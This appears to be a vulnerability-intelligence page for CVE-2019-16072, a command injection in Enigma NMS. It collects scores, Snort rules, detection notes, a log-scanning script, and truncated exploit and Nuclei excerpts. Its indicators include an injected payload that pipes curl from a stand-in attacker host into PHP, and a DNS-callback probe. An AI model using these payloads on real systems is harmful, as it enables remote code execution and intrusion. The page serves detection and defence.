CVE-2019-16072
Published 2020-03-20
Priority P1 · 85 · critical · 9.8 · CVSS 3.1
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 25.28% (97.7th percentile)
An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netsas | enigma_network_management_solution | <= 65.0.0 | — |
Detection & IOCs (extracted from sources)
URL: /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20<attack_host>:<web_svr_port>/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1
Command: |nslookup+{{interactsh-url}}
Bytes: |7c| (pipe character) in the ip_address parameter of the /cgi-bin/protected/discover_and_manage.cgi URI
Snort:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Outbound)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|7c|"; startswith; fast_pattern; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2019-16072; classtype:attempted-admin; sid:2029158; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2019_16072, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
Snort:
alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Inbound)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|7c|"; startswith; fast_pattern; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2019-16072; classtype:attempted-admin; sid:2029159; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2019_16072, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
- The exploit uses HTTP GET (PoC script) but the ET Snort rules trigger on the POST method to the vulnerable CGI endpoint; monitor both GET and POST to /cgi-bin/protected/discover_and_manage.cgi with action=snmp_browser and a pipe character (|, hex 7c) in the ip_address parameter.
- The exploit drops and serves a PHP reverse shell file named evil.php via a temporary HTTP server; detect outbound curl requests from the NMS host fetching .php files from attacker-controlled infrastructure.
- The Nuclei template uses an OOB/OAST DNS callback (interactsh) to confirm blind command injection; look for unexpected DNS lookups originating from the NMS host as a sign of exploitation.
- The exploit authenticates with HTTP Basic Auth before injecting; correlate successful Basic Auth logins to /cgi-bin/protected/main.cgi followed immediately by requests to discover_and_manage.cgi with shell metacharacters in ip_address.
- The vulnerability is exploited in the wild by the Mirai variant EchoBot; correlate CVE-2019-16072 exploitation attempts with other EchoBot IoT exploit signatures.
- The Nuclei template is marked 'verified: false', meaning the detection logic has not been confirmed against a live target and may produce false positives or false negatives.
- The exploit PoC uses HTTP GET, but the ET Snort rules are written for POST; deployments should ensure both HTTP methods are covered when writing detection rules for this CGI endpoint.
- Exploitation requires valid credentials (HTTP Basic Auth); unauthenticated scanning will not trigger the vulnerability, so detections relying solely on unauthenticated probes will miss authenticated attacker sessions.
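The detection notes above, turned into a log check. This is an added example, not code from the page or from any of the quoted sources: the access-log lines are constructed, and the check generalises the pipe-only Snort content match to any character that cannot appear in a legitimate IP address or hostname, covering GET as well as POST and percent- or double-encoded metacharacters.

```python
"""Flag CVE-2019-16072 exploitation attempts in web-server access logs.

Added example (not from the original page); the log lines are constructed.
Generalises the pipe-only Snort match to any character that cannot occur in
a legitimate IP address or hostname, and covers GET as well as POST.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

VULN_PATH = "/cgi-bin/protected/discover_and_manage.cgi"
# Allow-list: a real ip_address is an IPv4/IPv6 literal or a hostname.
SAFE_IP_ADDRESS = re.compile(r"^[A-Za-z0-9.:_-]*$")
# Request line of an Apache/nginx combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[0-9.]+"')


def is_injection_attempt(method: str, uri: str) -> bool:
    """True if a GET/POST hits the snmp_browser action with a tainted ip_address."""
    if method not in ("GET", "POST"):
        return False
    parts = urlsplit(uri)
    if parts.path != VULN_PATH:
        return False
    # parse_qs percent-decodes once, so %7C and a literal '|' look the same.
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("action") != ["snmp_browser"]:
        return False
    # Decode a second time so double-encoding (%257C) cannot slip past.
    return any(not SAFE_IP_ADDRESS.match(unquote(v))
               for v in params.get("ip_address", []))


def scan_access_log(lines):
    """Return (line_number, method, uri) for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and is_injection_attempt(m["method"], m["uri"]):
            hits.append((n, m["method"], m["uri"]))
    return hits


# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.7 - admin [16/Dec/2019:10:01:02 +0000] "GET /cgi-bin/protected/main.cgi HTTP/1.1" 200 512',
    '10.0.0.7 - admin [16/Dec/2019:10:01:09 +0000] "GET /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=192.0.2.10&snmp_ro_string=public HTTP/1.1" 200 2048',
    '10.0.0.7 - admin [16/Dec/2019:10:01:15 +0000] "GET /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=%7Cid&snmp_ro_string=public HTTP/1.1" 200 310',
    '10.0.0.7 - admin [16/Dec/2019:10:01:21 +0000] "POST /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|id HTTP/1.1" 200 310',
]
```

`scan_access_log(SAMPLE_LOG)` reports lines 3 and 4 only: the benign snmp_browser request with a plain IPv4 address on line 2 is not flagged.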
CVSS provenance
- NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
- VulnCheck: 9.8 CRITICAL
GHSA
CVE-2019-16072 [HIGH] GHSA-2f22-7m2c-fwgc: An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65
ghsa_unreviewed · 2022-05-24
VulnCheck
CVE-2019-16072 [CRITICAL] netsas enigma_network_management_solution Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck · 2019 · CVSS 9.8
Affected: netsas enigma_network_management_solution
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; https://www.f5.com/labs/articles/thr
Suricata
CVE-2019-16072 [CRITICAL] ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Outbound)
suricata · 2019-12-16 · CVSS 9.8
Rule: sid 2029158, quoted in full under Detection & IOCs above.
Suricata
CVE-2019-16072 [CRITICAL] ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Inbound)
suricata · 2019-12-16 · CVSS 9.8
Rule: sid 2029159, quoted in full under Detection & IOCs above.
Exploit-DB
CVE-2019-16072 [CRITICAL] Enigma NMS 65.0.0 - OS Command Injection
exploitdb · 2019-09-09 · CVSS 9.8
---
#!/usr/bin/python
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS OS Command Injection #
# NETSAS Pty Ltd Enigma NMS #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16072 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
#--------------------------------------------------------------------#
import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading
os.system('clear')
print("""\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Enigma
Nuclei
CVE-2019-16072 [CRITICAL] Enigma NMS < 65.0.0 - Authenticated OS Command Injection
nuclei · CVSS 9.8
An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an authenticated attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.
Template:
id: CVE-2019-16072

info:
  name: Enigma NMS < 65.0.0 - Authenticated OS Command Injection
  author: 0x_Akoko
  severity: critical
  description: |
    An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an authenticated attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.
  impact: |
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42 · 2019-12-13
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp